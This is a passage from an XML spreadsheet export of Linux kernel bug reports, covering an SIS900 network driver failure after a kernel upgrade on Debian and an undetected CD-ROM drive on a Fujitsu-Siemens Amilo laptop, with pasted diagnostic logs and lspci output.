    <t>2008-09-25 17:35 UTC</t>
  </si>
  <si>
    <t>Mateusz Pastewski</t>
  </si>
  <si>
    <t>2010-01-04 19:06 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.23.x Earliest failing kernel version: 2.6.24.x Distribution: Debian Etch 4.0 Hardware Environment: PC Software Enviroment: Problem Description: I installed Debian Etch 4.0 (with kernel 2.6.18-6-k7) on my machine with ECS K7S5A with built-in network card SIS900. During the installation and after first boot internet worked like a dream with auto configurated DHCP interface. But after change kernel to version 2.6.26.5 internet didn't work. In this moment I realized that I didn't change internet configurations, but I thought that it can be wrong in hardware configurations. On the other hand, the results by lspci and lspci -n, said that everything had worked perfectly. Then, I compiled kernel 2.6.26.5 with exacly the same .config file like kernel from debian distribution (2.6.18-6-k7) and internet didn't work too. After that, I compiled older kernel (2.6.17) with this .config file and internet started working! I think, it is proof that it is something wrong in module sis900 in the newest kernel versions, because I didn't change others system configurations! What is more, system didn't have interrupt for ethernet, thought lspci recognized network card, sis900 module was started and DHCP was set. To confirm my view I attache interrupt's list and logs from internet starting/restarting: tanya:/home/daimyo# cat /proc/interrupts CPU0 0: 430048 XT-PIC-XT timer 1: 185 XT-PIC-XT i8042 2: 0 XT-PIC-XT cascade 3: 1 XT-PIC-XT 4: 1 XT-PIC-XT 5: 0 XT-PIC-XT ohci_hcd:usb2 6: 5 XT-PIC-XT floppy 7: 0 XT-PIC-XT parport0 8: 1 XT-PIC-XT rtc 9: 1 XT-PIC-XT acpi 10: 2 XT-PIC-XT ehci_hcd:usb5, SiS SI7012 11: 228 XT-PIC-XT uhci_hcd:usb3, uhci_hcd:usb4 12: 0 XT-PIC-XT ohci_hcd:usb1 14: 42772 XT-PIC-XT ide0 15: 30385 XT-PIC-XT ide1 NMI: 0 Non-maskable interrupts LOC: 0 Local timer interrupts RES: 0 Rescheduling interrupts CAL: 0 function call interrupts TLB: 0 TLB shootdowns TRM: 0 Thermal event interrupts SPU: 0 Spurious interrupts ERR: 0 MIS: 0 tanya:/home/daimyo# sudo /etc/init.d/networking restart Reconfiguring network interfaces...There is already a pid file /var/run/dhclient.eth0.pid with pid 7018 killed old client process, removed PID file Internet Systems Consortium DHCP Client V3.0.4 Copyright 2004-2006 Internet Systems Consortium. All rights reserved. For info, please visit http://www.isc.org/sw/dhcp/ Listening on LPF/eth0/00:00:00:00:00:00 Sending on LPF/eth0/00:00:00:00:00:00 Sending on Socket/fallback DHCPRELEASE on eth0 to 192.168.1.1 port 67 send_packet: Network is unreachable send_packet: please consult README file regarding broadcast address. SIOCSIFFLAGS: Cannot assign requested address Internet Systems Consortium DHCP Client V3.0.4 Copyright 2004-2006 Internet Systems Consortium. All rights reserved. For info, please visit http://www.isc.org/sw/dhcp/ SIOCSIFFLAGS: Cannot assign requested address SIOCSIFFLAGS: Cannot assign requested address Listening on LPF/eth0/00:00:00:00:00:00 Sending on LPF/eth0/00:00:00:00:00:00 Sending on Socket/fallback DHCPDISCOVER on eth0 to 255.255.255.255 port 67 interval 8 send_packet: Network is down receive_packet failed on eth0: Network is down DHCPDISCOVER on eth0 to 255.255.255.255 port 67 interval 19 send_packet: Network is down DHCPDISCOVER on eth0 to 255.255.255.255 port 67 interval 15 send_packet: Network is down DHCPDISCOVER on eth0 to 255.255.255.255 port 67 interval 10 send_packet: Network is down DHCPDISCOVER on eth0 to 255.255.255.255 port 67 interval 9 send_packet: Network is down No DHCPOFFERS received. No working leases in persistent database - sleeping. done.</t>
  </si>
  <si>
    <t>Devices enabled in /proc/acpi/wakeup do not wake up any more</t>
  </si>
  <si>
    <t>2008-09-26 15:32 UTC</t>
  </si>
  <si>
    <t>2008-10-04 11:51 UTC</t>
  </si>
  <si>
    <t>CDROM on Laptop  Fudjitsu-siemens Amilo Xa-2528 isn't reconized</t>
  </si>
  <si>
    <t>2.6.26-5 debian amd64</t>
  </si>
  <si>
    <t>2008-09-27 06:09 UTC</t>
  </si>
  <si>
    <t>Remy LABENE</t>
  </si>
  <si>
    <t>2009-03-01 14:17 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: no Earliest failing kernel version: 2.6.26 (gcc version 4.3.1 ) Distribution: debian Hardware Environment: X86_64 Software Environment: k8 Problem Description: The IDE driver IDE-Generic or IDE-AMD7xxx don't start the CDROM on Laptop Fudjitsu-siemens Amilo Xa-2528 Steps to reproduce:; It's necessary to install Linux on this laptop to boot with a cdrom netinstall. After install the CD/DVD is see but it don't work. I try differents drivers IDE (Generic_ide and amd7xxx_ide) but the DVD don't work. My distribution is a debian amd64 lenny (testing, stable etch cdrom don't boot correctly). See my dmesg (part), lsmod, lspci, /proc/info... bellow : I will try to build the kernel with SCSI emulation for CDROM Thanks for your help Remy LABENE ------------------------------------------------------------ [ 4.743400] ata2: SATA link up 1.5 Gbps (SStatus 113 SControl 300) [ 4.811401] ata2.00: ATA-8: WDC WD2500BEVS-22UST0, 01.01A01, max UDMA/133 [ 4.811401] ata2.00: 488397168 sectors, multi 16: LBA48 NCQ (depth 31/32) [ 4.823400] ata2.00: configured for UDMA/133 [ 4.823400] isa bounce pool size: 16 pages [ 4.823400] scsi 0:0:0:0: Direct-Access ATA WDC WD2500BEVS-2 01.0 PQ: 0 ANSI: 5 [ 4.823400] scsi 1:0:0:0: Direct-Access ATA WDC WD2500BEVS-2 01.0 PQ: 0 ANSI: 5 [ 4.823400] forcedeth: Reverse Engineered nForce ethernet driver. Version 0.61. [ 5.511843] ohci1394: fw-host0: OHCI-1394 1.1 (PCI): IRQ=[11] MMIO=[c4000000-c40007ff] Max Packet=[2048] IR/IT contexts=[4/8] [ 5.522012] Uniform Multi-Platform E-IDE driver [ 5.522012] ide: Assuming 33MHz system bus speed for PIO modes; override with idebus=xx [ 5.524676] NFORCE-MCP51: 0000:00:0d.0 (rev f1) UDMA133 controller [ 5.524676] NFORCE-MCP51: IDE controller (0x10de:0x0265 rev 0xf1) at PCI slot 0000:00:0d.0 [ 5.524676] NFORCE-MCP51: not 100% native mode: will probe irqs later [ 5.524676] NFORCE-MCP51: BIOS didn't set cable bits correctly. Enabling workaround. [ 5.524676] ide0: BM-DMA at 0x3080-0x3087 [ 5.524676] ide1: BM-DMA at 0x3088-0x308f [ 5.524676] Probing IDE interface ide0... [ 5.608668] usb 2-8: configuration #1 chosen from 1 choice [ 5.608668] Driver 'sd' needs updating - please use bus_type methods [ 7.288168] ide0 at 0x1f0-0x1f7,0x3f6 on irq 14 &lt;---- bloc here at boot [ 37.292293] hda: irq timeout: status=0x58 { DriveReady SeekComplete DataRequest } [ 37.292293] ide: failed opcode was: 0xa1 [ 37.292293] ide1 at 0x170-0x177,0x376 on irq 15 [ 37.329063] hda: status error: status=0x58 { DriveReady SeekComplete DataRequest } [ 37.329204] ide: failed opcode was: unknown [ 37.329264] hda: drive not ready for command [ 37.329297] hda: ATAPI CD-ROM drive, 0kB Cache [ 37.329403] Uniform CD-ROM driver Revision: 3.20 [ 37.329460] hda: status error: status=0x58 { DriveReady SeekComplete DataRequest } [ 37.329595] ide: failed opcode was: unknown [ 37.329652] hda: drive not ready for command [ 37.329702] hda: status error: status=0x58 { DriveReady SeekComplete DataRequest } [ 37.329839] ide: failed opcode was: unknown [ 37.332334] hda: drive not ready for command [ 37.332367] hda: weird block size 0 [ 37.332398] hda: default to 2kb block size [ 37.332448] hda: status error: status=0x58 { DriveReady SeekComplete DataRequest } DataRequest } ----------------------------------------------------------- /proc/modules fujitsu_laptop 7112 0 - Live 0xffffffffa02ea000 rfcomm 37408 2 - Live 0xffffffffa02df000 l2cap 21888 5 rfcomm, Live 0xffffffffa02d8000 ipv6 284728 16 - Live 0xffffffffa0291000 ppdev 9416 0 - Live 0xffffffffa028d000 parport_pc 27928 0 - Live 0xffffffffa0285000 lp 12324 0 - Live 0xffffffffa0280000 parport 39456 3 ppdev,parport_pc,lp, Live 0xffffffffa0275000 video 21780 0 - Live 0xffffffffa026e000 output 5696 1 video, Live 0xffffffffa026b000 powernow_k8 14916 1 - Live 0xffffffffa0266000 cpufreq_powersave 4224 0 - Live 0xffffffffa0263000 cpufreq_stats 6864 0 - Live 0xffffffffa0260000 cpufreq_userspace 6276 0 - Live 0xffffffffa025d000 cpufreq_ondemand 9616 1 - Live 0xffffffffa0259000 cpufreq_conservative 9544 0 - Live 0xffffffffa0255000 freq_table 7168 3 powernow_k8,cpufreq_stats,cpufreq_ondemand, Live 0xffffffffa0252000 loop 17228 0 - Live 0xffffffffa024c000 joydev 12736 0 - Live 0xffffffffa0247000 snd_hda_intel 426188 1 - Live 0xffffffffa01dd000 snd_pcm_oss 38560 0 - Live 0xffffffffa01d2000 snd_mixer_oss 16704 1 snd_pcm_oss, Live 0xffffffffa01cc000 snd_pcm 79240 2 snd_hda_intel,snd_pcm_oss, Live 0xffffffffa01b7000 pcspkr 4864 0 - Live 0xffffffffa01b4000 snd_timer 23760 1 snd_pcm, Live 0xffffffffa01ad000 snd 61304 7 snd_hda_intel,snd_pcm_oss,snd_mixer_oss,snd_pcm,snd_timer, Live 0xffffffffa019d000 psmouse 40220 0 - Live 0xffffffffa0192000 serio_raw 7812 0 - Live 0xffffffffa018f000 k8temp 7040 0 - Live 0xffffffffa018c000 soundcore 9744 1 snd, Live 0xffffffffa0188000 snd_page_alloc 10960 2 snd_hda_intel,snd_pcm, Live 0xffffffffa0184000 hci_usb 16604 2 - Live 0xffffffffa017e000 bluetooth 53540 7 rfcomm,l2cap,hci_usb, Live 0xffffffffa016f000 i2c_nforce2 8512 0 - Live 0xffffffffa016b000 i2c_core 25440 1 i2c_nforce2, Live 0xffffffffa0163000 battery 14600 0 - Live 0xffffffffa015e000 container 6208 0 - Live 0xffffffffa015b000 ac 7240 0 - Live 0xffffffffa007e000 button 9504 0 - Live 0xffffffffa0157000 evdev 12160 6 - Live 0xffffffffa0153000 reiserfs 210256 2 - Live 0xffffffffa011e000 sd_mod 26928 5 - Live 0xffffffffa0116000 usbhid 43792 0 - Live 0xffffffffa010a000 hid 39584 1 usbhid, Live 0xffffffffa00ff000 ff_memless 7240 1 usbhid, Live 0xffffffffa00fc000 ide_cd_mod 34248 0 - Live 0xffffffffa00f2000 cdrom 36008 1 ide_cd_mod, Live 0xffffffffa00e8000 ohci1394 30260 0 - Live 0xffffffffa00dd000 ieee1394 90984 1 ohci1394, Live 0xffffffffa00c5000 forcedeth 51664 0 - Live 0xffffffffa00b7000 sata_nv 25160 5 - Live 0xffffffffa00af000 libata 164288 1 sata_nv, Live 0xffffffffa0085000 amd74xx 11336 0 [permanent], Live 0xffffffffa0081000 scsi_mod 158232 2 sd_mod,libata, Live 0xffffffffa0056000 dock 11808 1 libata, Live 0xffffffffa0052000 ide_core 127244 2 ide_cd_mod,amd74xx, Live 0xffffffffa002f000 ohci_hcd 22724 0 - Live 0xffffffffa0026000 ehci_hcd 34764 0 - Live 0xffffffffa001a000 thermal 20512 0 - Live 0xffffffffa0013000 processor 40512 2 powernow_k8,thermal, Live 0xffffffffa0008000 fan 7176 0 - Live 0xffffffffa0005000 thermal_sys 15424 4 video,thermal,processor,fan, Live 0xffffffffa0000000 --------------------------------------------------------------------------- /proc/ioports 0000-001f : dma1 0020-0021 : pic1 0040-0043 : timer0 0050-0053 : timer1 0060-0060 : keyboard 0064-0064 : keyboard 0070-0071 : rtc0 0080-008f : dma page reg 00a0-00a1 : pic2 00c0-00df : dma2 00f0-00ff : fpu 0170-0177 : 0000:00:0d.0 0170-0177 : NFORCE-MCP51 01f0-01f7 : 0000:00:0d.0 01f0-01f7 : NFORCE-MCP51 0360-0361 : pnp 00:0b 0376-0376 : 0000:00:0d.0 0376-0376 : NFORCE-MCP51 03c0-03df : vga+ 03f6-03f6 : 0000:00:0d.0 03f6-03f6 : NFORCE-MCP51 04d0-04d1 : pnp 00:0b 0cf8-0cff : PCI conf1 1000-107f : pnp 00:03 1000-1003 : ACPI PM1a_EVT_BLK 1004-1005 : ACPI PM1a_CNT_BLK 1008-100b : ACPI PM_TMR 1010-1015 : ACPI CPU throttle 1020-1027 : ACPI GPE0_BLK 1080-10ff : pnp 00:03 1400-147f : pnp 00:03 1480-14ff : pnp 00:03 1484-1484 : ACPI PM2_CNT_BLK 1800-187f : pnp 00:03 1880-18ff : pnp 00:03 3000-303f : 0000:00:0a.1 3000-303f : nForce2_smbus 3040-307f : 0000:00:0a.1 3040-307f : nForce2_smbus 3080-308f : 0000:00:0d.0 3080-308f : NFORCE-MCP51 3090-309f : 0000:00:0e.0 3090-309f : sata_nv 30a0-30a3 : 0000:00:0e.0 30a0-30a3 : sata_nv 30a4-30a7 : 0000:00:0e.0 30a4-30a7 : sata_nv 30a8-30af : 0000:00:0e.0 30a8-30af : sata_nv 30b0-30b7 : 0000:00:0e.0 30b0-30b7 : sata_nv 30b8-30bf : 0000:00:14.0 30b8-30bf : forcedeth 4000-4fff : PCI Bus 0000:01 5000-5fff : PCI Bus 0000:05 5000-507f : 0000:05:00.0 6000-6fff : PCI Bus 0000:07 6000-607f : 0000:07:06.0 --------------------------------------------------------------------------- /proc/iomem 00000000-0009dbff : System RAM 0009dc00-0009ffff : reserved 000ce000-000fffff : reserved 00100000-7ff5ffff : System RAM 00200000-00435b60 : Kernel code 00435b61-0053f167 : Kernel data 005e3000-00676df7 : Kernel bss 7ff60000-7ff69fff : ACPI Tables 7ff6a000-7ff7ffff : ACPI Non-volatile Storage 7ff80000-7fffffff : reserved c0000000-c0003fff : 0000:00:10.1 c0000000-c0003fff : ICH HD audio c0004000-c0004fff : 0000:00:0b.0 c0004000-c0004fff : ohci_hcd c0005000-c00050ff : 0000:00:0b.1 c0005000-c00050ff : ehci_hcd c0006000-c0006fff : 0000:00:0e.0 c0006000-c0006fff : sata_nv c0007000-c0007fff : 0000:00:14.0 c0007000-c0007fff : forcedeth c0040000-c007ffff : 0000:00:0a.3 c0200000-c03fffff : PCI Bus 0000:01 c1000000-c3ffffff : PCI Bus 0000:05 c1000000-c1ffffff : 0000:05:00.0 c2000000-c3ffffff : 0000:05:00.0 c4000000-c40fffff : PCI Bus 0000:07 c4000000-c40007ff : 0000:07:06.0 c4000000-c40007ff : ohci1394 c4200000-c43fffff : PCI Bus 0000:01 d0000000-dfffffff : PCI Bus 0000:05 d0000000-dfffffff : 0000:05:00.0 e0000000-efffffff : reserved e0000000-e06fffff : PCI MMCONFIG 0 fec00000-fec0ffff : reserved fec00000-fec00fff : IOAPIC 0 fed00000-fed00fff : pnp 00:00 fed00000-fed003ff : HPET 0 fee00000-fee00fff : Local APIC fee00000-fee00fff : reserved fff80000-ffffffff : reserved -------------------------------------------------------------- lspci -vvvv : 00:00.0 RAM memory: nVidia Corporation C51 Host Bridge (rev a2) Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Capabilities: [44] HyperTransport: Slave or Primary Interface Command: BaseUnitID=0 UnitCnt=15 MastHost- DefDir- DUL- Link Control 0: CFlE+ CST- CFE- &lt;LkFail- Init+ EOC- TXO- &lt;CRCErr=3 IsocEn- LSEn+ ExtCTL- 64b- Link Config 0: MLWI=16bit DwFcIn- MLWO=16bit DwFcOut- LWI=16bit DwFcInEn- LWO=16bit DwFcOutEn- Link Control 1: CFlE+ CST- CFE- &lt;LkFail- Init+ EOC- TXO- &lt;CRCErr=0 IsocEn- LSEn+ ExtCTL- 64b- Link Config 1: MLWI=16bit DwFcIn- MLWO=16bit DwFcOut- LWI=8bit DwFcInEn- LWO=8bit DwFcOutEn- Revision ID: 1.03 Link Frequency 0: 800MHz Link Error 0: &lt;Prot- &lt;Ovfl- &lt;EOC- CTLTm- Link Frequency Capability 0: 200MHz+ 300MHz+ 400MHz+ 500MHz+ 600MHz+ 800MHz+ 1.0GHz+ 1.2GHz- 1.4GHz- 1.6GHz- Vend- Feature Capability: IsocFC+ LDTSTOP+ CRCTM- ECTLT- 64bA- UIDRD- Link Frequency 1: 800MHz Link Error 1: &lt;Prot- &lt;Ovfl- &lt;EOC- CTLTm- Link Frequency Capability 1: 200MHz+ 300MHz+ 400MHz+ 500MHz+ 600MHz+ 800MHz+ 1.0GHz+ 1.2GHz- 1.4GHz- 1.6GHz- Vend- Error Handling: PFlE+ OFlE+ PFE- OFE- EOCFE- RFE- CRCFE- SERRFE- CF- RE- PNFE- ONFE- EOCNFE- RNFE- CRCNFE- SERRNFE- Prefetchable memory behind bridge Upper: 00-00 Bus Number: 00 Capabilities: [e0] HyperTransport: MSI Mapping Enable+ Fixed- Mapping Address Base: 00000000fee00000 00:00.1 RAM memory: nVidia Corporation C51 Memory Controller 0 (rev a2) Subsystem: Fujitsu Siemens Computers Device 110c Control: I/O- Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- DisINTx- Status: Cap- 66MHz+ UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR+ &lt;PERR- INTx- 00:00.2 RAM memory: nVidia Corporation C51 Memory Controller 1 (rev a2) Subsystem: Fujitsu Siemens Computers Device 110c Control: I/O- Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz+ UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- 00:00.3 RAM memory: nVidia Corporation C51 Memory Controller 5 (rev a2) Subsystem: Fujitsu Siemens Computers Device 110c Control: I/O- Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- 00:00.4 RAM memory: nVidia Corporation C51 Memory Controller 4 (rev a2) Subsystem: Fujitsu Siemens Computers Device 110c Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 00:00.5 RAM memory: nVidia Corporation C51 Host Bridge (rev a2) Subsystem: Fujitsu Siemens Computers Device 110c Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Capabilities: [44] #00 [00fe] Capabilities: [fc] #00 [0000] 00:00.6 RAM memory: nVidia Corporation C51 Memory Controller 3 (rev a2) Subsystem: Fujitsu Siemens Computers Device 110c Control: I/O- Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- DisINTx- Status: Cap- 66MHz+ UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- 00:00.7 RAM memory: nVidia Corporation C51 Memory Controller 2 (rev a2) Subsystem: Fujitsu Siemens Computers Device 110c Control: I/O- Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz+ UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- 00:02.0 PCI bridge: nVidia Corporation C51 PCI Express Bridge (rev a1) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- DisINTx+ Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0, Cache Line Size: 64 bytes Bus: primary=00, secondary=01, subordinate=01, sec-latency=0 I/O behind bridge: 00004000-00004fff Memory behind bridge: c0200000-c03fffff Prefetchable memory behind bridge: 00000000c4200000-00000000c43fffff Secondary status: 66MHz- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &lt;SERR- &lt;PERR- BridgeCtl: Parity- SERR- NoISA+ VGA- MAbort- &gt;Reset- FastB2B- PriDiscTmr- SecDiscTmr- DiscTmrStat- DiscTmrSERREn- Capabilities: [40] Subsystem: nVidia Corporation Device 0000 Capabilities: [48] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Capabilities: [50] Message Signalled Interrupts: Mask- 64bit+ Queue=0/1 Enable+ Address: 00000000fee0300c Data: 4149 Capabilities: [60] HyperTransport: MSI Mapping Enable+ Fixed- Mapping Address Base: 00000000fee00000 Capabilities: [80] Express (v1) Root Port (Slot+), MSI 00 DevCap: MaxPayload 128 bytes, PhantFunc 0, Latency L0s &lt;512ns, L1 &lt;4us ExtTag- RBE- FLReset- DevCtl: Report errors: Correctable+ Non-Fatal+ Fatal+ Unsupported+ RlxdOrd+ ExtTag- PhantFunc- AuxPwr- NoSnoop+ MaxPayload 128 bytes, MaxReadReq 512 bytes DevSta: CorrErr- UncorrErr- FatalErr- UnsuppReq- AuxPwr- TransPend- LnkCap: Port #2, Speed 2.5GT/s, Width x1, ASPM L0s L1, Latency L0 &lt;512ns, L1 &lt;4us ClockPM- Suprise- LLActRep+ BwNot- LnkCtl: ASPM Disabled; RCB 64 bytes Disabled- Retrain- CommClk- ExtSynch- ClockPM- AutWidDis- BWInt- AutBWInt- LnkSta: Speed 2.5GT/s, Width x1, TrErr- Train- SlotClk+ DLActive- BWMgmt- ABWMgmt- SltCap: AttnBtn- PwrCtrl- MRL- AttnInd- PwrInd- HotPlug+ Surpise- Slot # 0, PowerLimit 0.000000; Interlock- NoCompl- SltCtl: Enable: AttnBtn- PwrFlt- MRL- PresDet- CmdCplt- HPIrq+ LinkChg+ Control: AttnInd Off, PwrInd On, Power- Interlock- SltSta: Status: AttnBtn- PowerFlt- MRL- CmdCplt- PresDet- Interlock- Changed: MRL- PresDet- LinkState- RootCtl: ErrCorrectable- ErrNon-Fatal- ErrFatal- PMEIntEna- CRSVisible- RootCap: CRSVisible- RootSta: PME ReqID 0000, PMEStatus- PMEPending- Capabilities: [100] Virtual Channel &lt;?&gt; Kernel driver in use: pcieport-driver Kernel modules: shpchp 00:03.0 PCI bridge: nVidia Corporation C51 PCI Express Bridge (rev a1) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- DisINTx+ Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0, Cache Line Size: 64 bytes Bus: primary=00, secondary=03, subordinate=03, sec-latency=0 I/O behind bridge: 0000f000-00000fff Memory behind bridge: fff00000-000fffff Prefetchable memory behind bridge: 00000000fff00000-00000000000fffff Secondary status: 66MHz- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &lt;SERR- &lt;PERR- BridgeCtl: Parity- SERR- NoISA+ VGA- MAbort- &gt;Reset- FastB2B- PriDiscTmr- SecDiscTmr- DiscTmrStat- DiscTmrSERREn- Capabilities: [40] Subsystem: nVidia Corporation Device 0000 Capabilities: [48] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Capabilities: [50] Message Signalled Interrupts: Mask- 64bit+ Queue=0/1 Enable+ Address: 00000000fee0300c Data: 4151 Capabilities: [60] HyperTransport: MSI Mapping Enable+ Fixed- Mapping Address Base: 00000000fee00000 Capabilities: [80] Express (v1) Root Port (Slot+), MSI 00 DevCap: MaxPayload 128 bytes, PhantFunc 0, Latency L0s &lt;512ns, L1 &lt;4us ExtTag- RBE- FLReset- DevCtl: Report errors: Correctable+ Non-Fatal+ Fatal+ Unsupported+ RlxdOrd+ ExtTag- PhantFunc- AuxPwr- NoSnoop+ MaxPayload 128 bytes, MaxReadReq 512 bytes DevSta: CorrErr- UncorrErr- FatalErr- UnsuppReq- AuxPwr- TransPend- LnkCap: Port #1, Speed 2.5GT/s, Width x1, ASPM L0s L1, Latency L0 &lt;512ns, L1 &lt;4us ClockPM- Suprise- LLActRep+ BwNot- LnkCtl: ASPM Disabled; RCB 64 bytes Disabled- Retrain- CommClk- ExtSynch- ClockPM- AutWidDis- BWInt- AutBWInt- LnkSta: Speed 2.5GT/s, Width x1, TrErr- Train- SlotClk+ DLActive- BWMgmt- ABWMgmt- SltCap: AttnBtn- PwrCtrl- MRL- AttnInd- PwrInd- HotPlug+ Surpise- Slot # 0, PowerLimit 0.000000; Interlock- NoCompl- SltCtl: Enable: AttnBtn- PwrFlt- MRL- PresDet- CmdCplt- HPIrq+ LinkChg+ Control: AttnInd Off, PwrInd On, Power- Interlock- SltSta: Status: AttnBtn- PowerFlt- MRL- CmdCplt- PresDet+ Interlock- Changed: MRL- PresDet- LinkState- RootCtl: ErrCorrectable- ErrNon-Fatal- ErrFatal- PMEIntEna- CRSVisible- RootCap: CRSVisible- RootSta: PME ReqID 0000, PMEStatus- PMEPending- Capabilities: [100] Virtual Channel &lt;?&gt; Kernel driver in use: pcieport-driver Kernel modules: shpchp 00:04.0 PCI bridge: nVidia Corporation C51 PCI Express Bridge (rev a1) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- DisINTx+ Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0, Cache Line Size: 64 bytes Bus: primary=00, secondary=05, subordinate=05, sec-latency=0 I/O behind bridge: 00005000-00005fff Memory behind bridge: c1000000-c3ffffff Prefetchable memory behind bridge: 00000000d0000000-00000000dfffffff Secondary status: 66MHz- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &lt;SERR- &lt;PERR- BridgeCtl: Parity- SERR- NoISA+ VGA+ MAbort- &gt;Reset- FastB2B- PriDiscTmr- SecDiscTmr- DiscTmrStat- DiscTmrSERREn- Capabilities: [40] Subsystem: nVidia Corporation Device 0000 Capabilities: [48] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Capabilities: [50] Message Signalled Interrupts: Mask- 64bit+ Queue=0/1 Enable+ Address: 00000000fee0300c Data: 4159 Capabilities: [60] HyperTransport: MSI Mapping Enable+ Fixed- Mapping Address Base: 00000000fee00000 Capabilities: [80] Express (v1) Root Port (Slot+), MSI 00 DevCap: MaxPayload 128 bytes, PhantFunc 0, Latency L0s &lt;512ns, L1 &lt;4us ExtTag- RBE- FLReset- DevCtl: Report errors: Correctable+ Non-Fatal+ Fatal+ Unsupported+ RlxdOrd+ ExtTag- PhantFunc- AuxPwr- NoSnoop+ MaxPayload 128 bytes, MaxReadReq 512 bytes DevSta: CorrErr- UncorrErr- FatalErr- UnsuppReq- AuxPwr- TransPend- LnkCap: Port #0, Speed 2.5GT/s, Width x16, ASPM L0s L1, Latency L0 &lt;512ns, L1 &lt;4us ClockPM- Suprise- LLActRep+ BwNot- LnkCtl: ASPM L0s L1 Enabled; RCB 64 bytes Disabled- Retrain- CommClk+ ExtSynch- ClockPM- AutWidDis- BWInt- AutBWInt- LnkSta: Speed 2.5GT/s, Width x16, TrErr- Train- SlotClk+ DLActive+ BWMgmt- ABWMgmt- SltCap: AttnBtn- PwrCtrl- MRL- AttnInd- PwrInd- HotPlug- Surpise- Slot # 0, PowerLimit 0.000000; Interlock- NoCompl- SltCtl: Enable: AttnBtn- PwrFlt- MRL- PresDet- CmdCplt- HPIrq- LinkChg- Control: AttnInd Off, PwrInd On, Power- Interlock- SltSta: Status: AttnBtn- PowerFlt- MRL- CmdCplt- PresDet+ Interlock- Changed: MRL- PresDet+ LinkState+ RootCtl: ErrCorrectable- ErrNon-Fatal- ErrFatal- PMEIntEna- CRSVisible- RootCap: CRSVisible- RootSta: PME ReqID 0000, PMEStatus- PMEPending- Capabilities: [100] Virtual Channel &lt;?&gt; Kernel driver in use: pcieport-driver Kernel modules: shpchp 00:09.0 RAM memory: nVidia Corporation MCP51 Host Bridge (rev a2) Subsystem: Fujitsu Siemens Computers Device 110c Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Capabilities: [44] HyperTransport: Slave or Primary Interface Command: BaseUnitID=9 UnitCnt=15 MastHost- DefDir- DUL- Link Control 0: CFlE+ CST- CFE- &lt;LkFail- Init+ EOC- TXO- &lt;CRCErr=0 IsocEn- LSEn+ ExtCTL- 64b- Link Config 0: MLWI=8bit DwFcIn- MLWO=8bit DwFcOut- LWI=8bit DwFcInEn- LWO=8bit DwFcOutEn- Link Control 